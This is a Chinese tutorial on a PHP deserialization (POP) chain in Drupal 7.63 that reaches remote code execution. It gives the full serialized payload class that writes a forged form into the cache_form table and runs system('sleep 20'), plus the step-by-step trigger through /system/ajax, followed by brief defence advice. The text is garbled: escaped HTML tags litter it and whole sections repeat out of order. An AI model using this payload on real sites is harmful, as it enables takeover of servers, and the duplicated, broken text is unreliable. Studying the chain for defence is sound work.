Drupal POP 利用链分析与利用教学文档<\/h1>

前言<\/h2>
本教学文档详细分析了一个基于 Drupal 7.63 的对象注入(POP)利用链，该利用链通过反序列化漏洞实现了与 Drupalgeddon 2 相同的远程代码执行效果。文档将逐步解析漏洞原理、利用链构造和实际利用方法。<\/p>

漏洞背景<\/h2>

目标环境<\/strong>: Drupal 7.63<\/li>
漏洞类型<\/strong>: PHP 反序列化漏洞(PHP 对象注入)<\/li>

利用前提<\/strong>: 存在可控的反序列化入口点(如题目中通过 Cookie 注入序列化字符串)<\/li> <\/ul>
核心利用链分析<\/h2>
第一阶段: 注入缓存数据<\/h3>
利用链始于 DrupalCacheArray<\/code> 类的 __destruct()<\/code> 方法，该方法会在对象销毁时自动调用：<\/p>
public<\/span> function<\/span> __destruct() { <\/span><\/span> $data =<\/span> array<\/span>(); <\/span><\/span> foreach<\/span> ($this-><\/span>keysToPersist<\/span> as<\/span> $offset =><\/span> $persist) { <\/span><\/span> if<\/span> ($persist) { <\/span><\/span> $data[$offset] =<\/span> $this-><\/span>storage<\/span>[$offset]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span> if<\/span> (!<\/span>empty<\/span>($data)) { <\/span><\/span> $this-><\/span>set<\/span>($data); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点：<\/p> 遍历 $this->keysToPersist<\/code> 数组，将需要持久化的数据存入 $data<\/code><\/li> 调用 set()<\/code> 方法将数据写入缓存<\/li> <\/ol> set()<\/code> 方法最终调用 cache_set()<\/code> 函数：<\/p> protected<\/span> function<\/span> set<\/span>($data, $lock =<\/span> TRUE<\/span>) { <\/span><\/span> $lock_name =<\/span> $this-><\/span>cid<\/span> .<\/span> ':'<\/span> .<\/span> $this-><\/span>bin<\/span>; <\/span><\/span> if<\/span> (!<\/span>$lock ||<\/span> lock_acquire<\/span>($lock_name)) { <\/span><\/span> if<\/span> ($cached =<\/span> cache_get<\/span>($this-><\/span>cid<\/span>, $this-><\/span>bin<\/span>)) { <\/span><\/span> $data =<\/span> $cached-><\/span>data<\/span> +<\/span> $data; <\/span><\/span> } <\/span><\/span> cache_set<\/span>($this-><\/span>cid<\/span>, $data, $this-><\/span>bin<\/span>); <\/span><\/span> if<\/span> ($lock) { <\/span><\/span> lock_release<\/span>($lock_name); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>攻击者可控制的三个关键属性：<\/p> $this->cid<\/code>: 缓存标识符<\/li> $this->bin<\/code>: 缓存表名<\/li> $this->storage<\/code>: 要写入的数据<\/li> <\/ul> 缓存表结构分析<\/h3> Drupal 使用多个表存储不同类型的缓存：<\/p> cache cache_block cache_bootstrap cache_field cache_filter cache_form cache_image cache_menu cache_page cache_path <\/code><\/pre> cache_form<\/code> 表结构：<\/p> Field<\/th> Type<\/th> Description<\/th> <\/tr> <\/thead> cid<\/td> varchar(255)<\/td> 缓存标识符<\/td> <\/tr> data<\/td> longblob<\/td> 存储的缓存数据<\/td> <\/tr> expire<\/td> int(11)<\/td> 过期时间<\/td> <\/tr> created<\/td> int(11)<\/td> 创建时间<\/td> <\/tr> serialized<\/td> smallint(6)<\/td> 是否序列化的标志<\/td> <\/tr> <\/tbody> <\/table> 验证缓存注入<\/h3> 构造测试类验证缓存注入可行性：<\/p> class<\/span> SchemaCache<\/span> { <\/span><\/span> protected<\/span> $cid =<\/span> "some_cache_key"<\/span>; <\/span><\/span> protected<\/span> $bin =<\/span> "cache_form"<\/span>; <\/span><\/span> protected<\/span> $keysToPersist =<\/span> array<\/span>('input_data'<\/span> =><\/span> true<\/span>); <\/span><\/span> protected<\/span> $storage =<\/span> array<\/span>('input_data'<\/span> =><\/span> array<\/span>("arbitrary data!"<\/span>)); <\/span><\/span>} <\/span><\/span> <\/span><\/span>$schema =<\/span> new<\/span> SchemaCache<\/span>(); <\/span><\/span>echo<\/span> serialize<\/span>($schema); <\/span><\/span><\/code><\/pre>成功注入后，cache_form<\/code> 表中将包含可控数据。<\/p> 第二阶段: 从缓存到RCE<\/h2> Ajax回调触发点<\/h3> 通过访问 \/system\/ajax<\/code> 触发 ajax_form_callback()<\/code> 函数：<\/p> function<\/span> ajax_form_callback<\/span>() { <\/span><\/span> list<\/span>($form, $form_state, $form_id, $form_build_id, $commands) =<\/span> ajax_get_form<\/span>(); <\/span><\/span> drupal_process_form<\/span>($form['#form_id'<\/span>], $form, $form_state); <\/span><\/span>} <\/span><\/span><\/code><\/pre>ajax_get_form()<\/code> 从 cache_form<\/code> 表中获取数据：<\/p> if<\/span> ($cached =<\/span> cache_get<\/span>('form_'<\/span> .<\/span> $form_build_id, 'cache_form'<\/span>)) { <\/span><\/span> $form =<\/span> $cached-><\/span>data<\/span>; <\/span><\/span> return<\/span> $form; <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用 drupal_process_form<\/code><\/h3> drupal_process_form()<\/code> 中的关键代码：<\/p> if<\/span> (isset<\/span>($element['#process'<\/span>]) &&<\/span> !<\/span>$element['#processed'<\/span>]) { <\/span><\/span> foreach<\/span> ($element['#process'<\/span>] as<\/span> $process) { <\/span><\/span> $element =<\/span> $process($element, $form_state, $form_state['complete form'<\/span>]); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>通过控制 $element['#process']<\/code> 可以触发回调函数。<\/p> 最终RCE实现<\/h3> 利用 drupal_process_attached()<\/code> 实现代码执行：<\/p> function<\/span> drupal_process_attached<\/span>($elements, $group =<\/span> JS_DEFAULT<\/span>, $dependency_check =<\/span> FALSE<\/span>, $every_page =<\/span> NULL<\/span>) { <\/span><\/span> foreach<\/span> ($elements['#attached'<\/span>] as<\/span> $callback =><\/span> $options) { <\/span><\/span> if<\/span> (function_exists<\/span>($callback)) { <\/span><\/span> foreach<\/span> ($elements['#attached'<\/span>][$callback] as<\/span> $args) { <\/span><\/span> call_user_func_array<\/span>($callback, $args); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>完整利用链构造<\/h2> 构造最终的POP链：<\/p> class<\/span> SchemaCache<\/span> { <\/span><\/span> protected<\/span> $cid =<\/span> "form_1337"<\/span>; <\/span><\/span> protected<\/span> $bin =<\/span> "cache_form"<\/span>; <\/span><\/span> protected<\/span> $keysToPersist =<\/span> array<\/span>( <\/span><\/span> '#form_id'<\/span> =><\/span> true<\/span>, <\/span><\/span> '#process'<\/span> =><\/span> true<\/span>, <\/span><\/span> '#attached'<\/span> =><\/span> true<\/span> <\/span><\/span> ); <\/span><\/span> protected<\/span> $storage =<\/span> array<\/span>( <\/span><\/span> '#form_id'<\/span> =><\/span> 1337<\/span>, <\/span><\/span> '#process'<\/span> =><\/span> array<\/span>('drupal_process_attached'<\/span>), <\/span><\/span> '#attached'<\/span> =><\/span> array<\/span>( <\/span><\/span> 'system'<\/span> =><\/span> array<\/span>(array<\/span>('sleep 20'<\/span>)) <\/span><\/span> ) <\/span><\/span> ); <\/span><\/span>} <\/span><\/span> <\/span><\/span>$schema =<\/span> new<\/span> SchemaCache<\/span>(); <\/span><\/span>echo<\/span> serialize<\/span>($schema); <\/span><\/span><\/code><\/pre>利用步骤<\/h2> 注入恶意序列化数据<\/strong>：通过反序列化入口(如Cookie)注入构造的序列化对象<\/li> 触发缓存写入<\/strong>：对象销毁时自动将数据写入 cache_form<\/code> 表<\/li> 触发RCE<\/strong>：访问 \/system\/ajax<\/code> 并设置 form_build_id=1337<\/code> 触发命令执行<\/li> <\/ol> 防御建议<\/h2> 升级到最新Drupal版本<\/li> 避免不可信的反序列化操作<\/li> 对缓存数据进行严格验证<\/li> 限制危险函数的使用<\/li> <\/ol> 总结<\/h2> 该利用链展示了如何通过精心构造的POP链，从反序列化漏洞逐步实现远程代码执行。理解此类漏洞需要对Drupal内部机制和PHP反序列化特性有深入认识。防御此类攻击需要从多个层面进行防护，包括输入验证、输出编码和最小权限原则等。<\/p>

Field<\/th>	Type<\/th>	Description<\/th> <\/tr> <\/thead>
cid<\/td>	varchar(255)<\/td>	缓存标识符<\/td> <\/tr>
data<\/td>	longblob<\/td>	存储的缓存数据<\/td> <\/tr>
expire<\/td>	int(11)<\/td>	过期时间<\/td> <\/tr>
created<\/td>	int(11)<\/td>	创建时间<\/td> <\/tr>
serialized<\/td>	smallint(6)<\/td>	是否序列化的标志<\/td> <\/tr> <\/tbody> <\/table> 验证缓存注入<\/h3> 构造测试类验证缓存注入可行性：<\/p> class<\/span> SchemaCache<\/span> { <\/span><\/span> protected<\/span> $cid =<\/span> "some_cache_key"<\/span>; <\/span><\/span> protected<\/span> $bin =<\/span> "cache_form"<\/span>; <\/span><\/span> protected<\/span> $keysToPersist =<\/span> array<\/span>('input_data'<\/span> =><\/span> true<\/span>); <\/span><\/span> protected<\/span> $storage =<\/span> array<\/span>('input_data'<\/span> =><\/span> array<\/span>("arbitrary data!"<\/span>)); <\/span><\/span>} <\/span><\/span> <\/span><\/span>$schema =<\/span> new<\/span> SchemaCache<\/span>(); <\/span><\/span>echo<\/span> serialize<\/span>($schema); <\/span><\/span><\/code><\/pre>成功注入后，cache_form<\/code> 表中将包含可控数据。<\/p> 第二阶段: 从缓存到RCE<\/h2> Ajax回调触发点<\/h3> 通过访问 \/system\/ajax<\/code> 触发 ajax_form_callback()<\/code> 函数：<\/p> function<\/span> ajax_form_callback<\/span>() { <\/span><\/span> list<\/span>($form, $form_state, $form_id, $form_build_id, $commands) =<\/span> ajax_get_form<\/span>(); <\/span><\/span> drupal_process_form<\/span>($form['#form_id'<\/span>], $form, $form_state); <\/span><\/span>} <\/span><\/span><\/code><\/pre>ajax_get_form()<\/code> 从 cache_form<\/code> 表中获取数据：<\/p> if<\/span> ($cached =<\/span> cache_get<\/span>('form_'<\/span> .<\/span> $form_build_id, 'cache_form'<\/span>)) { <\/span><\/span> $form =<\/span> $cached-><\/span>data<\/span>; <\/span><\/span> return<\/span> $form; <\/span><\/span>} <\/span><\/span><\/code><\/pre>利用 drupal_process_form<\/code><\/h3> drupal_process_form()<\/code> 中的关键代码：<\/p> if<\/span> (isset<\/span>($element['#process'<\/span>]) &&<\/span> !<\/span>$element['#processed'<\/span>]) { <\/span><\/span> foreach<\/span> ($element['#process'<\/span>] as<\/span> $process) { <\/span><\/span> $element =<\/span> $process($element, $form_state, $form_state['complete form'<\/span>]); <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>通过控制 $element['#process']<\/code> 可以触发回调函数。<\/p> 最终RCE实现<\/h3> 利用 drupal_process_attached()<\/code> 实现代码执行：<\/p> function<\/span> drupal_process_attached<\/span>($elements, $group =<\/span> JS_DEFAULT<\/span>, $dependency_check =<\/span> FALSE<\/span>, $every_page =<\/span> NULL<\/span>) { <\/span><\/span> foreach<\/span> ($elements['#attached'<\/span>] as<\/span> $callback =><\/span> $options) { <\/span><\/span> if<\/span> (function_exists<\/span>($callback)) { <\/span><\/span> foreach<\/span> ($elements['#attached'<\/span>][$callback] as<\/span> $args) { <\/span><\/span> call_user_func_array<\/span>($callback, $args); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>完整利用链构造<\/h2> 构造最终的POP链：<\/p> class<\/span> SchemaCache<\/span> { <\/span><\/span> protected<\/span> $cid =<\/span> "form_1337"<\/span>; <\/span><\/span> protected<\/span> $bin =<\/span> "cache_form"<\/span>; <\/span><\/span> protected<\/span> $keysToPersist =<\/span> array<\/span>( <\/span><\/span> '#form_id'<\/span> =><\/span> true<\/span>, <\/span><\/span> '#process'<\/span> =><\/span> true<\/span>, <\/span><\/span> '#attached'<\/span> =><\/span> true<\/span> <\/span><\/span> ); <\/span><\/span> protected<\/span> $storage =<\/span> array<\/span>( <\/span><\/span> '#form_id'<\/span> =><\/span> 1337<\/span>, <\/span><\/span> '#process'<\/span> =><\/span> array<\/span>('drupal_process_attached'<\/span>), <\/span><\/span> '#attached'<\/span> =><\/span> array<\/span>( <\/span><\/span> 'system'<\/span> =><\/span> array<\/span>(array<\/span>('sleep 20'<\/span>)) <\/span><\/span> ) <\/span><\/span> ); <\/span><\/span>} <\/span><\/span> <\/span><\/span>$schema =<\/span> new<\/span> SchemaCache<\/span>(); <\/span><\/span>echo<\/span> serialize<\/span>($schema); <\/span><\/span><\/code><\/pre>利用步骤<\/h2> 注入恶意序列化数据<\/strong>：通过反序列化入口(如Cookie)注入构造的序列化对象<\/li> 触发缓存写入<\/strong>：对象销毁时自动将数据写入 cache_form<\/code> 表<\/li> 触发RCE<\/strong>：访问 \/system\/ajax<\/code> 并设置 form_build_id=1337<\/code> 触发命令执行<\/li> <\/ol> 防御建议<\/h2> 升级到最新Drupal版本<\/li> 避免不可信的反序列化操作<\/li> 对缓存数据进行严格验证<\/li> 限制危险函数的使用<\/li> <\/ol> 总结<\/h2> 该利用链展示了如何通过精心构造的POP链，从反序列化漏洞逐步实现远程代码执行。理解此类漏洞需要对Drupal内部机制和PHP反序列化特性有深入认识。防御此类攻击需要从多个层面进行防护，包括输入验证、输出编码和最小权限原则等。<\/p>

Drupal POP 利用链分析与利用教学文档<\/h1>

前言<\/h2> 本教学文档详细分析了一个基于 Drupal 7.63 的对象注入(POP)利用链，该利用链通过反序列化漏洞实现了与 Drupalgeddon 2 相同的远程代码执行效果。文档将逐步解析漏洞原理、利用链构造和实际利用方法。<\/p>

核心利用链分析<\/h2>

前言<\/h2>
本教学文档详细分析了一个基于 Drupal 7.63 的对象注入(POP)利用链，该利用链通过反序列化漏洞实现了与 Drupalgeddon 2 相同的远程代码执行效果。文档将逐步解析漏洞原理、利用链构造和实际利用方法。<\/p>